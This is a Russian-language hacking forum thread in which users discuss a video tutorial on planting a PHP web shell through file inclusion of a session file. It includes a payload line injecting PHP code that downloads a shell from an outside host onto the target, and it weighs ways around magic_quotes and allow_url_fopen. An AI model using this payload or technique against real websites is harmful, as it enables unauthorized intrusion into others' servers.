Видео голимое, выкладывают просто потому что на античате у меня еще нет ни одного) + может кому-нибудь пригодится. В общем для галочки. (каминтцы присутствуют)

скачать (http://bug-track.ru/prog/shell_sess.rar)

Видео, ок .
Поставил чисто так + !
Кстати прон слил или чо там?

Если голимое, зачем засорять раздел?
Сними нормальное и выкладывай тогда уж "для галочки".

ничего нового. можно было и по другому залить.

"Видео голимое". - самокритичен =)) это хорошо.

видео не понравилось :(
15 минут мы наблюдаем за тем как у тебя глючит браузер :/

Ты 15 минут заливался через инклуд? Школота одобряэ!

советую почитать-

http://forum.antichat.ru/thread149241.html

Ты 15 минут заливался через инклуд? Школота одобряэ!

выложено для тех, кто так никогда не делал или не знал про такой способ, спортивный хек на время - это для школьников, ага - МОА, ЛОА и выше )

Сделай видео как подбирать поля в скуле длительностью 30 минут, для тех кто не знает.

Мне, как начинающему чайнику, видео очень понравилось. До его просмотра вообще ничего не знал про инклуды, а после просмотра уже есть понимание, лучше даже чем от хорошей статьи.
Автору респект и +

согласен. поучительное видео... ток реально чёт долго ты всё делал...

Сделай видео как подбирать поля в скуле длительностью 30 минут, для тех кто не знает.
ахах,жжощ.

п.с. за видео +, т.к. аналогичного не видел

Даа жесть. Видео, конечно, интересное :)

Но. Полчаса лить шелл, это что-то. На середине видео я уже еле сдерживался, чтоб не закрыть плеер и не пойти критиковать :)

Во-первых, зачем ты в опере смотришь куки ТАКИМ образом? Это дико тормозно и медленно, проще жать ПКМ -> настройки для сайта -> Cookie (таким образом, опера не читают куки всех доменов, а только домена, на котором ты находишься сейчас.)

Во-вторых, magic quotes on там - но в скрипте скорей всего просто stripslashes делается, так что ничего странного нет.

В-третьих, зачем вводить cmd переменную? Тем более проверять ее существование isset-ом (ты же не будешь сначала пустой запрос слать, а сразу с кодом твоим). Эта переменная не нужна там совершенно, можно было банально сделать:

sess_[номер сессии]%00<?php copy('http://server.com/shell.txt', '../media/z.php');?>

И по этой причине html-форму какую-то выдумывать и через нее аплоадить шелл не пришлось бы.

phpinfo и абсолютный путь смотреть тоже, в принципе не обязательно было.

Но. Полчаса лить шелл, это что-то. На середине видео я уже еле сдерживался, чтоб не закрыть плеер и не пойти критиковат


носит учебный характер, разжевывалось каждое движение


Во-первых, зачем ты в опере смотришь куки ТАКИМ образом? Это дико тормозно и медленно, проще жать ПКМ -> настройки для сайта -> Cookie (таким образом, опера не читают куки всех доменов, а только домена, на котором ты находишься сейчас.)


согласен


Во-вторых, magic quotes on там - но в скрипте скорей всего просто stripslashes делается, так что ничего странного нет.


Не обязательно, просто так же в скрипте можно отключить маджики или через .htaccess в данной конкретной папке


В-третьих, зачем вводить cmd переменную? Тем более проверять ее существование isset-ом (ты же не будешь сначала пустой запрос слать, а сразу с кодом твоим). Эта переменная не нужна там совершенно, можно было банально сделать:

Цитата:
sess_[номер сессии]%00<?php copy('http://server.com/shell.txt', '../media/z.php');?>

И по этой причине html-форму какую-то выдумывать и через нее аплоадить шелл не пришлось бы.


1. Зависишь от alloq_url_fopen=ON
2. Зависишь от magic_quotes=ON
3. Палишь домен
4. Зависишь от качества соединения со своим доменом - что лучше, загрузить со своего компа сразу или откуда-то?

Именно для это и продемонстрирован практически универсальный способ при фактически любых ограничениях

phpinfo и абсолютный путь смотреть тоже, в принципе не обязательно было.

Имхо, асболютно не соглашусь, прежде чем лечить, надо дать диагноз виктуму:

1. Просто проверяем, что php-код исполняется
2. Узнаем не только абсолютный путь, но и много другой важной и полезной информации (тот же allow_url_fopen=on, кхм + запрещенные функции и т.д.)

PS: Я не полчаса лил шелл, а полчаса снимал видео, как это можно сделать, с подробными объяснениями каждого шага, не рассчитано на опытных, хотя и некоторые из них, судя по посту выше, половины своих действий/бездействий просто не понимают

мне понравилось.
спасибо

поддержу.. Видео гуд

а где скачать шелл ?

видео понравилось, спасибо тс

а где скачать шелл ?
http://forum.antichat.ru/thread103155.html

Спасибо, хорошее видео. очень позновательно

а где скачать шелл ?

Школа детектед :D Вот тут почитай http://forum.antichat.ru/showthread.php?t=28163